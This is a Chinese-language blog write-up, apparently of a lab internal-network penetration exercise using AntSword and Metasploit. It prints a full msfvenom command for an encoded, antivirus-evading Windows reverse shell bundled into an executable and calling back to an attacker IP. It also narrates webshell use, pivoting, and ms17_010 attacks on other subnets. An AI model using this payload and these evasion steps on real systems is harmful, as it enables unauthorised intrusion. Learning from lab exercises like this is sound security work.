内网渗透(蚁剑 +MSF)
0x01 192.168.2.244 攻击
(1)使用的是之前本科实验室的同学在 192.168.2.244/bigdata 上留的一句话木马
(2)因为本人技术有限,只能采用上传后门的方式来拿到 shell,好在蚁剑足已满足我上传木马的需求。在这一步只需要使用 msf 生成木马(使用 theFatRat 生成的木马稳定性不怎么滴,而且不能绕过火绒)。最后产生的木马效果最好如下:
msf>msfvenom -p windows/shell_reverse_tcp LHOST=192.168.4.215 LPORT=6227 -e x86/shikata_ga_nai -x IPradar5.exe -i 5 -f exe -o /root/Desktop/backdoor.exe
-e x86/shikata_ga_nai 此步意为使用 shikata_ga_nai 的编码方式对攻击载荷进行重新编码,上文有讲
-x IPradar5.exe 此步意为将木马捆绑在指定的可执行程序模版上,此处为 IPradar5.exe
-i 5 此处意为使用刚才设定的编码方式对目标进行 5 次编码(多次编码理论上来讲有助于免杀,但是也不一定,毕竟杀软不是白收费的,免杀技术飞速发展,新的免杀技术一出现就会被各大安全厂商盯上的。。。。)
-f exe 此步意为指定 MSF 编码器输出格式为 exe
-o /root/Desktop/backdoor.exe 此步意为指定处理完毕后的文件输出路径
本人自己写了个 exe 程序来替代 IPradar5.exe。能维持住运行就 ok。其他的就和该模板一样了。
(3)使用蚁剑传大马
其中 halo.exe 的免杀与稳定性最好。同时使用该代码的时候需要注意如果防御方管理员在线,则会直接关掉你的木马,因此还需对其进行改进,但目前阶段来说足够了。
0x02 跳板机布置
在上一阶段,我们拿到了反弹回来的 244 的 shell,这时后渗透阶段神器 meterpreter 就要上线了。
第一步提权,从 mysql 的数据库管理员上升到系统权限
第二步 建立路由
第三步,设代理
第四步,proxychains 加 nmap 扫描
在设代理这里总会有一些问题,设置完本地走 session 的代理之后也不能全局使用 proxychains 来打。
surprise! 500G 网络安全学习资料,👉戳此免费获取
0x03 攻击三网段
(1)首先使用 ms17_010 的扫描模块
在这里有 9,20,23,43 这三台主机上存在漏洞。我们开始一台一台来试
(2)展开攻击
这里打 3.9 的时候看到有报错,就很烦。之前 connection reset by peer 报错在百度上搜索之后拘束和 TCP 协议的三次握手有关系,有可能是网速过慢或其他原因。
在这里,运气爆棚!!!之前打 192.168.3.43 总会有 connection 报错,不过这次会话最终也没有维持太久。在给一位老哥看环境的时候就无情地断掉了。(不过跳转两个会话地路由看着还是真的舒服)
0x04 打 boss
之后果断接着对 1.4 的日志服务器逮着 445 一把梭,最后失败.....这也是我目前为止走的最远的一次了。
0xXX 后记
在本次整体的攻击过程中,见到了多位大佬的神操作。比如 3h 大佬的爆破密码技术和修改注册表绕过不允许空密码用户远程登陆,还有久哥使用 ms17_command 来实现任意代码执行。同样还见识到 Cobalt Strike 该渗透工具的强大。日后也准备自己租个公网服务器搭上一个。最后,虽然本次攻击实验 一边渗透,一边运维,晚上有时候还要值夜班为大佬们保证环境的稳定。但是,每一次成功弹回来 shell 的时候,每一次在熟悉的 meterpreter 出现在眼前的时候,就会发现这一切都是值得的。
评论